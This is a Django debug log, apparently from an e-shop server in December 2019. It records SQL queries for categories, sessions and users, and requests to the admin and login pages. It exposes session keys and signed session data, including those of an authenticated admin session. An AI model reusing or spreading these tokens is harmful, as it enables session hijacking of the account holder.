"shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 06:33:59,816 utils 32196 139885028853504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 06:33:59,818 utils 32196 139885028853504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 06:33:59,820 utils 32196 139885028853504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 06:33:59] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [10/Dec/2019 06:35:33] "GET /shop/category/ HTTP/1.0" 302 0 [10/Dec/2019 06:35:33] "GET /auth/user/ HTTP/1.0" 302 0 DEBUG 2019-12-10 06:35:33,324 utils 32196 139885018363648 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'hoksgwo7t1oys7vgogl1p71tpyiltpw9' LIMIT 1; args=('hoksgwo7t1oys7vgogl1p71tpyiltpw9',) DEBUG 2019-12-10 06:35:33,326 utils 32196 139885018363648 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('hoksgwo7t1oys7vgogl1p71tpyiltpw9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T06:35:33.324601+00:00'::timestamptz); args=('hoksgwo7t1oys7vgogl1p71tpyiltpw9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 6, 35, 33, 324601, tzinfo=)) [10/Dec/2019 06:35:33] "GET /login/?next=/shop/category/ HTTP/1.0" 200 1814 DEBUG 2019-12-10 06:35:33,386 utils 32196 139885018363648 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 't4cm5j9ee7uyao9qoc24g7r6ghbejucr' LIMIT 1; args=('t4cm5j9ee7uyao9qoc24g7r6ghbejucr',) DEBUG 2019-12-10 06:35:33,388 utils 32196 139885018363648 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('t4cm5j9ee7uyao9qoc24g7r6ghbejucr', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T06:35:33.387199+00:00'::timestamptz); args=('t4cm5j9ee7uyao9qoc24g7r6ghbejucr', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 6, 35, 33, 387199, tzinfo=)) [10/Dec/2019 06:35:33] "GET /login/?next=/auth/user/ HTTP/1.0" 200 1806 DEBUG 2019-12-10 06:36:34,836 utils 32196 139885018363648 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-10T06:36:34.828050+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 10, 6, 36, 34, 828050, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-10 06:36:34,839 utils 32196 139885018363648 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-10 06:36:34,870 utils 32196 139885018363648 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-10 06:36:34,877 utils 32196 139885018363648 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-24T06:36:34.876452+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 24, 6, 36, 34, 876452, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [10/Dec/2019 06:36:34] "GET /admin/ HTTP/1.0" 200 8857 DEBUG 2019-12-10 06:36:38,908 utils 32196 139885018363648 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-10T06:36:38.898579+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 10, 6, 36, 38, 898579, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-10 06:36:38,911 utils 32196 139885018363648 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-10 06:36:38,914 utils 32196 139885018363648 (0.001) SELECT "auth_group"."id", "auth_group"."name" FROM "auth_group" ORDER BY "auth_group"."name" ASC; args=() DEBUG 2019-12-10 06:36:38,916 utils 32196 139885018363648 (0.001) SELECT COUNT(*) AS "__count" FROM "auth_user"; args=() DEBUG 2019-12-10 06:36:38,917 utils 32196 139885018363648 (0.000) SELECT COUNT(*) AS "__count" FROM "auth_user"; args=() DEBUG 2019-12-10 06:36:38,921 utils 32196 139885018363648 (0.000) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" ORDER BY "auth_user"."username" ASC; args=() DEBUG 2019-12-10 06:36:39,012 utils 32196 139885018363648 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-24T06:36:39.010587+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 24, 6, 36, 39, 10587, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [10/Dec/2019 06:36:39] "GET /auth/user/ HTTP/1.0" 200 9542 DEBUG 2019-12-10 06:36:39,306 utils 32196 139885018363648 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-10T06:36:39.297375+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 10, 6, 36, 39, 297375, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-10 06:36:39,309 utils 32196 139885018363648 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [10/Dec/2019 06:36:39] "GET /jsi18n/ HTTP/1.0" 200 3223 [10/Dec/2019 06:36:54] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 06:37:04,467 utils 32196 139885018363648 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 06:37:04,473 utils 32196 139885018363648 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 06:37:04,475 utils 32196 139885018363648 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 06:37:04,478 utils 32196 139885018363648 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 06:37:04,481 utils 32196 139885018363648 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 06:37:04,483 utils 32196 139885018363648 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 06:37:04,485 utils 32196 139885018363648 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 06:37:04,487 utils 32196 139885018363648 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 06:37:04,490 utils 32196 139885018363648 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 06:37:04,492 utils 32196 139885018363648 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 06:37:04,495 utils 32196 139885018363648 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 06:37:04] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 06:37:11,875 utils 32196 139885018363648 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-10T06:37:11.865497+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 10, 6, 37, 11, 865497, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-10 06:37:11,878 utils 32196 139885018363648 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-10 06:37:11,912 utils 32196 139885018363648 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-10 06:37:11,921 utils 32196 139885018363648 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-24T06:37:11.919170+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 24, 6, 37, 11, 919170, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [10/Dec/2019 06:37:11] "GET /admin/ HTTP/1.0" 200 8857 DEBUG 2019-12-10 06:37:13,767 utils 32196 139885018363648 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-10T06:37:13.754594+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 10, 6, 37, 13, 754594, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-10 06:37:13,770 utils 32196 139885018363648 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-10 06:37:13,773 utils 32196 139885018363648 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-10 06:37:13,774 utils 32196 139885018363648 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-10 06:37:13,779 utils 32196 139885018363648 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-10 06:37:13,871 utils 32196 139885018363648 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-24T06:37:13.868784+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 24, 6, 37, 13, 868784, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [10/Dec/2019 06:37:13] "GET /shop/category/ HTTP/1.0" 200 6758 DEBUG 2019-12-10 06:37:14,160 utils 32196 139885018363648 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-10T06:37:14.151059+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 10, 6, 37, 14, 151059, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-10 06:37:14,162 utils 32196 139885018363648 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [10/Dec/2019 06:37:14] "GET /jsi18n/ HTTP/1.0" 200 3223 [10/Dec/2019 06:41:42] "GET /auth/user/ HTTP/1.0" 302 0 [10/Dec/2019 06:41:42] "GET /shop/category/ HTTP/1.0" 302 0 DEBUG 2019-12-10 06:41:42,594 utils 32196 139885018363648 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'l7n7t6939t0u0jo3mmokhmag1e700111' LIMIT 1; args=('l7n7t6939t0u0jo3mmokhmag1e700111',) DEBUG 2019-12-10 06:41:42,596 utils 32196 139885018363648 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('l7n7t6939t0u0jo3mmokhmag1e700111', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T06:41:42.595121+00:00'::timestamptz); args=('l7n7t6939t0u0jo3mmokhmag1e700111', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 6, 41, 42, 595121, tzinfo=)) [10/Dec/2019 06:41:42] "GET /login/?next=/auth/user/ HTTP/1.0" 200 1806 DEBUG 2019-12-10 06:41:42,770 utils 32196 139885018363648 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'mc774star83ikcoarkggujtr9ei2xf2z' LIMIT 1; args=('mc774star83ikcoarkggujtr9ei2xf2z',) DEBUG 2019-12-10 06:41:42,773 utils 32196 139885018363648 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('mc774star83ikcoarkggujtr9ei2xf2z', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T06:41:42.771602+00:00'::timestamptz); args=('mc774star83ikcoarkggujtr9ei2xf2z', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 6, 41, 42, 771602, tzinfo=)) [10/Dec/2019 06:41:42] "GET /login/?next=/shop/category/ HTTP/1.0" 200 1814 [10/Dec/2019 06:41:56] "GET / HTTP/1.0" 302 0 [10/Dec/2019 06:44:37] "HEAD / HTTP/1.0" 302 0 Not Found: /robots.txt [10/Dec/2019 06:44:37] "GET /robots.txt HTTP/1.0" 404 6626 DEBUG 2019-12-10 06:44:37,423 utils 32196 139885028853504 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'oaqz2si3wnmjgxjmdbyiw5ynsjib0u32' LIMIT 1; args=('oaqz2si3wnmjgxjmdbyiw5ynsjib0u32',) DEBUG 2019-12-10 06:44:37,425 utils 32196 139885028853504 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('oaqz2si3wnmjgxjmdbyiw5ynsjib0u32', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T06:44:37.424322+00:00'::timestamptz); args=('oaqz2si3wnmjgxjmdbyiw5ynsjib0u32', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 6, 44, 37, 424322, tzinfo=)) [10/Dec/2019 06:44:37] "HEAD /login/?next=/ HTTP/1.0" 200 1786 [10/Dec/2019 06:44:37] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 06:44:37,631 utils 32196 139885028853504 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '6asy51l8fw1iyfcfj8gn6bsj7anvqxfk' LIMIT 1; args=('6asy51l8fw1iyfcfj8gn6bsj7anvqxfk',) DEBUG 2019-12-10 06:44:37,633 utils 32196 139885028853504 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('6asy51l8fw1iyfcfj8gn6bsj7anvqxfk', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T06:44:37.632023+00:00'::timestamptz); args=('6asy51l8fw1iyfcfj8gn6bsj7anvqxfk', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 6, 44, 37, 632023, tzinfo=)) [10/Dec/2019 06:44:37] "GET /login/?next=/ HTTP/1.0" 200 1786 [10/Dec/2019 06:44:37] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 06:44:37,880 utils 32196 139885028853504 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'e8s68yqii80cio8q0ennsc5ngy2f7qft' LIMIT 1; args=('e8s68yqii80cio8q0ennsc5ngy2f7qft',) DEBUG 2019-12-10 06:44:37,882 utils 32196 139885028853504 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('e8s68yqii80cio8q0ennsc5ngy2f7qft', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T06:44:37.881157+00:00'::timestamptz); args=('e8s68yqii80cio8q0ennsc5ngy2f7qft', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 6, 44, 37, 881157, tzinfo=)) [10/Dec/2019 06:44:37] "GET /login/?next=/ HTTP/1.0" 200 1786 [10/Dec/2019 06:46:59] "GET / HTTP/1.0" 302 0 [10/Dec/2019 06:50:05] "HEAD /auth/user/ HTTP/1.0" 302 0 [10/Dec/2019 06:50:05] "HEAD /shop/category/ HTTP/1.0" 302 0 DEBUG 2019-12-10 06:50:05,298 utils 32196 139885018363648 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'prcv2v2yxv0d7dif005812i5cdthgl6v' LIMIT 1; args=('prcv2v2yxv0d7dif005812i5cdthgl6v',) DEBUG 2019-12-10 06:50:05,300 utils 32196 139885028853504 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'e0u4ni0ove70ookmqgs7l60mfsbx5euv' LIMIT 1; 